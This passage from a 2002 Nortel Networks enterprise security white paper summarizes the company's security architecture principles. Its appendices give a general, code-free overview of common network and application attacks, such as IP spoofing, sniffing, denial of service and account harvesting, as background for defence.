enterprises and carriers to reduce customer operating expense and vendor R&D expense.
• Joint Group on Network and Information Security (NIS). This is a new European initiative formed by ETSI and the
European Committee for Standardization. NIS helps coordinate effective use of security standards to establish trust
on the Internet. Nortel Networks chairs NIS.
45
Nortel Networks maintains an internal cross-functional team—the Security Advisory Task Force (SATF)—which reports to the
Chief Technology Officer and addresses security vulnerabilities that could impact Nortel Networks products, as soon as these
vulnerabilities are discovered.

This internal task force has established relationships with key security vulnerability agencies in the industry such as CERT,
SANS, and ISA to ensure rapid awareness of new vulnerabilities. A process has been established to determine the level of risk
of each potential vulnerability to Nortel Networks customers, along with a risk mitigation plan, where required.

Where appropriate, the vulnerability status of Nortel Networks portfolio is communicated in Vendor Statements on the
corresponding CERT Web page and through action bulletins created with internal product teams that specify a risk analysis,
vulnerability status, mitigation plan, and planned patch release dates. These bulletins are made available to customers,
customer support teams, and account teams. Finally, the team follows up on all issues until closure.

Summary
The typical enterprise “internal” trusted network is anything but internal these days. It extends to include supply chain
partners, telecommuters, remote access users, Web users, application service providers, disaster recovery providers, and more.
Unfortunately, that means that the network also reaches hackers, cyber-thieves, disgruntled employees, and others who would
misappropriate network resources for personal gain.

Whether or not they leverage the inherently insecure Internet for business applications, all enterprises have an obligation to
protect network integrity and data confidentiality—for their own sakes as well as for their customers and business partners.

The good news is that enterprises can minimize their risks from unauthorized users without sacrificing performance for legiti-
mate users. The Nortel Networks Unified Security Architecture defines a conceptual, physical, and procedural framework of
best recommendations for end-to-end enterprise network security. Addressing the Top Ten security challenges with flexible
implementation choices, this comprehensive security strategy is based on these key principles:

1. Multi-layer security that defines security protection functions at application, network-assisted, and network security
levels
2. Variable-depth security across the enterprise, not just at the edge of the Internet
3. Closed-loop policy management that entails continuous evolution of policy to address changing business requirements,
network conditions, and industry knowledge
4. Uniform access management via stringent authentication and authorization at a granular level, defined and managed
centrally for the entire enterprise
5. Secure network operations, by physically or logically partitioning network management from user traffic, and applying
security best practices to suit critical operational activities
6. Secure multimedia communications, protected by high-performance encryption and tunneling
7. Survival under attack, ensuring that the network continues to deliver critical services even as it detects and wards off
malicious activities
The principles underpinning the Unified Security Architecture offer enterprises a blueprint for implementing security solutions
to ensure information integrity and confidentiality across a full range of network applications and architectures, including
protection from external attacks, application abuse, viruses, unauthorized access, interception, or manipulation of data en route.

With Nortel Networks Security Solutions, enterprises can protect business critical resources, and confidently and confidentially
use the Internet as an extension of their trusted internal network.

For more information about security products, terms, standards, organizations, legislation, and certification, visit our security
solutions Web site at http://www.nortelnetworks.com/solutions/security/related.html.

46
Appendix A. Hackers’ tools of the trade
Unauthorized access to network resources is usually the result of improper system configuration and usage flaws. Attackers
can take advantage of weak user authentication and authorization tools, improper allocation of hidden space, shared privileges
among applications, or even sloppy employee habits, such as posting their secret passwords on the side of their computers.

Attackers can obtain illegal access by guessing user names and passwords using a dictionary of common strings, by deriving
passwords by algorithmic means, or capturing them in transit if they are sent unencrypted. After guessing or intercepting a user
name and associated password, the attacker gains a dangerous level of access to internal resources. How much access depends
on the privileges assigned to the compromised account, naturally. But in reality, the potential for damage depends more on the
hacker’s intent. Usually the hacker’s mission is to use the compromised account to install a backdoor entry to the enterprise.

Protocols for remote access to e-mail such as IMAP, POP3, and POP2 use simple user name and password authentication tech-
niques. These protocols can be used to facilitate brute force attacks. In fact, there are published methods that allow attackers to
remotely exploit the services of these protocols.

There are even more sophisticated ways of gaining unauthorized access. Worms can be used to perform system-spoofing attacks
whereby one system component masquerades as another. For example, worms can exploit flows in the debug option of send-
mail and in .rhosts (e.g used in UNIX) due to weak authentication. The debug option of sendmail can be turned off. Leaving
the option on is an example of usage flaw.

IP spoofing or session hijacking is a complex attack that exploits trust relationships. The attacker assumes the identity of a
trusted host in order to sabotage the security of the target host. As far as the target host knows, it is carrying on a conversation
with a trusted host.

In this assault, the attacker first identifies a trusted host whose identity will be assumed, perhaps by first determining the
“patterns of trust” for the host—that is, the range of IP addresses that the host trusts. The next step involves the disabling of
the host (such as by TCP SYN flooding attacks), since the attacker will assume its identity.

IP spoofing attacks succeed because it is easy to forge IP addresses and network-based address authentication techniques are
limited. The IP spoofing attack is blind, since the attacker may not have access to the responses from the target host. However,
the attacker can obtain two-way communication if routing tables are manipulated to use the spoofed source IP address. IP
spoofing attacks are often used as a first step for other assaults such as Denial of Service (DoS) and flooding attacks.

Network sniffers were originally designed to enable network managers to diagnose problems, perform analysis, or improve the
performance of their networks. Network sniffers work in a network segment that is not switched, such as segments connected
through a hub. In this way, the sniffer can see all traffic on that segment.

Older sniffers read packet headers of the network traffic and focused on identifying low-level packet characteristics such as
source and destination address. However, current sniffers can decode data from packets across all layers of the OSI model.

Attackers can use sniffers to view user information and passwords from packets across public or private networks. By using
sniffers, attackers can obtain valuable information about user names and passwords in particular from applications such as FTP,
telnet, and others that send passwords in the clear. Protocols for remote access to e-mail such as IMAP, POP3, and POP2 use
simple user name and password authentication techniques and are especially susceptible to sniffer attacks.

Since users tend to reuse passwords across multiple applications and platforms, attackers can use the acquired information to
obtain access to various resources on the network, where their confidentiality could be compromised. Moreover, these resources
could also be used as launch pads for other attacks.

47
In general, attackers can use network sniffers by compromising the physical security of the corporation—say, walking into
the office and plugging a laptop into the network. With the growing use of wireless networks, someone in the parking lot with
a wireless device can access the enterprise’s local network. Gaining access to the core packet network enables the attacker to
determine configurations and modes of operation for further exploitation.

Denial of Service (DoS) attacks flood a network with illegitimate requests and thereby prevent legitimate users from accessing
their service. DoS attacks are easy to implement and can cause significant damage, disrupting the operation of the enterprise
and effectively disconnecting it from the rest of the world.

DoS attacks can take various forms and target a variety of services. DoS attacks focus on exhausting network, servers, host, and
application resources and on disrupting network connectivity. For example, the SYN flooding attack uses bogus half-open TCP
connection requests that exhaust memory capacity of the targeted resource. These types of attacks can prevent legitimate users
from accessing hosts, Web applications, and other network resources. Distributed DoS attacks use the resources of more than
one machine to launch synchronized DoS attacks on a resource.

DoS attacks exploit weaknesses in the architecture of the system that is under attack. In some cases, it exploits the weakness of
many common Internet protocols, such as the Internet Control Message Protocol (ICMP). For example, some DoS attacks
send large number of ICMP echo (ping) packets to an IP broadcast address. The packets use a spoofed IP address of a potential
target. The replies coming back to the target can cripple it. These types of attacks are called Smurf attacks. Another form of
attack uses UDP packets but works on the same concept.

Bucket brigade attacks are also known as “man-in-the-middle” attacks. In this kind of assault the attacker intercepts messages
in a public key exchange between a server and a client. The attacker retransmits the messages, substituting their public key for
the requested one. The original parties will think that they are communicating with each other. The attacker may just have
access to the messages or may modify them. Network sniffers can be used to launch such attacks.

Back door entries to access network resources can be accidentally or intentionally opened by users and procedural oversights,
such as these:

• Deliberately placed by system developers to allow quick access during development and not turned off upon delivery
• Placed by employees to facilitate performance of their duties
• Part of standard operating system installs that have not been eliminated by “OS hardening,” such as retaining default
user logon ID and password combinations
• Placed by disgruntled employees to allow access after termination
• Created by the execution of malicious code, such as viruses

Masquerading or elevation of privilege enables a hacker to pose as a valid administrator or engineer to access the network.
Masquerading as a user with administrative privileges, the intruder can modify accounts, configuration data, network signaling,
and billing and usage data.

Eavesdropping takes advantage of the “promiscuous mode” of off-the-shelf Ethernet adaptors that are sold in the market.
This mode enables an attacker to capture every packet on the network to listen and record data communications on the
enterprise LAN. There are plenty of free network sniffers on the Web today that an attacker can use for eavesdropping.
Eavesdropping is an insidious problem because it is difficult to detect.

48
Appendix B. Application and network level threats
Application threats
Application-layer attacks exploit vulnerabilities in the operating system and applications to gain access to resources.
For example, since Web hosts are accessible by the public at known port addresses specified by protocols (such as port 80
for HTTP traffic), hackers can use this knowledge to launch attacks that can bypass firewalls.

Improper configuration and authorization can lead to security holes. For example, a Web server host should freely distribute
Web pages but restrict shell command access to authorized administrators as specified in the security policy.

Account harvesting targets the authentication process when an application requests the user’s logon ID and password.
Applications that generate different error messages for wrong user logon ID and wrong password are vulnerable to this type
of attack. Based on the type of error message, an intruder can customize an attack that first determines a valid user logon ID
and then uses other forms of password cracking techniques to get the password.

Application-layer attacks can be based on viruses, worms, buffer overflow, and password harvesting among others. Some
application-layer attacks are aimed at just dismantling the Web site. Other attacks poison a Web site’s cookies to gain illegiti-
mate information about a particular server. Applications in general do not check the validity of cookies and can fall victim to
malicious code hidden in the cookies. Known vulnerabilities in current Web browsers allow such cookies-based attacks.

An attacker may also use cross-site scripting technique to insert malicious code in the form of a script tag that is added to
a URL and executed when an unsuspecting user clicks on the URL. SSL can solve some of these application-layer security
problems but doesn’t fully protect Web applications. Attacks such as account harvesting and password cracking can still be
launched even if SSL is used.

Network threats
Internet-connected enterprises expose their network infrastructure to serious security threats such as sabotage, vandalism, bad
system configuration, denial of service (DoS), snooping, industrial espionage, and theft of service. Attacks may be launched
from inside the network by insiders and also from external sources such as hackers.

Recent developments in hacker technology—such as mobile terminal-based port scanners—demonstrate that attacks on
network infrastructure can originate from the mobile terminal as well. How do you protect switches, routers, access points,
remote access servers, wireless access points, hosts, and other resources from these threats?

The typical IP packet infrastructure demonstrates a wide array of vulnerabilities:

• It commonly uses protocols with known security vulnerabilities, such as ICMP, TELNET, SNMPv1 and v2, DHCP,
TFTP, RIPv1, NTP, DNS, and HTTP. Other common protocols (e.g., FTP, IMAP, SMTP) may also have vulnerabilities.
• It uses weak, locally managed, static passwords based on short, common dictionary words that are easy to guess.
Some administrators may use one password across network elements, which may be shared and would be known
by all administrators.
• It leaves security information unprotected—for instance—by not encrypting password files, improperly setting firewall
rules, or using weak encryption methods for transmitting passwords.
• It supports unauthenticated software loads and configuration files that are intentionally or maliciously incorrect, resulting
in erroneous device configurations, poor performance, loss of service, and open invitations for Trojan horses or other
malicious code.
• It uses “non-hardened” network elements and operating systems that still use factory default settings, which may run
unnecessary services and have default accounts and passwords still enabled.
• It unnecessarily exposes management ports and interfaces to the public network, or allows unauthorized management
actions over dial-up, ISDN, or other connections.
49
In the United States:
Nortel Networks
35 Davis Drive
Research Triangle Park, NC 27709
USA

In Canada:
Nortel Networks
8200 Dixie Road,
Suite 100
Brampton, Ontario L6T 5P6 Nortel Networks is an industry leader and innovator focused on transforming how the world
Canada communicates and exchanges information. The company is supplying its service provider and
In Caribbean and Latin America: enterprise customers with communications technology and infrastructure to enable value-added
Nortel Networks IP data, voice and multimedia services spanning Metro and Enterprise Networks, Wireless Networks,
1500 Concorde Terrace and Optical Long Haul Networks. As a global company, Nortel Networks does business in more than
Sunrise, FL 33323 150 countries. More information about Nortel Networks can be found on the web at:
USA

In Europe:
Nortel Networks
www.nortelnetworks.com/security
Maidenhead Office Park
Westacott Way For more information, contact your Nortel Networks representative, or
Maidenhead Berkshire SL6 3QH call 1-800-4 NORTEL or 1-800-466-7835 from anywhere in North America.
UK
*Nortel Networks, the Nortel Networks logo, and the globemark design are trademarks of Nortel Networks.
In Asia: All other trademarks are the property of their owners
Nortel Networks Asia
6/F Cityplaza 4,
Copyright © 2002 Nortel Networks. All rights reserved. Information in this document is subject to change without notice.
Taikooshing,
Nortel Networks assumes no responsibility for any errors that may appear in this document.
12 Taikoo Wan Road,
Hong Kong NN102060-0902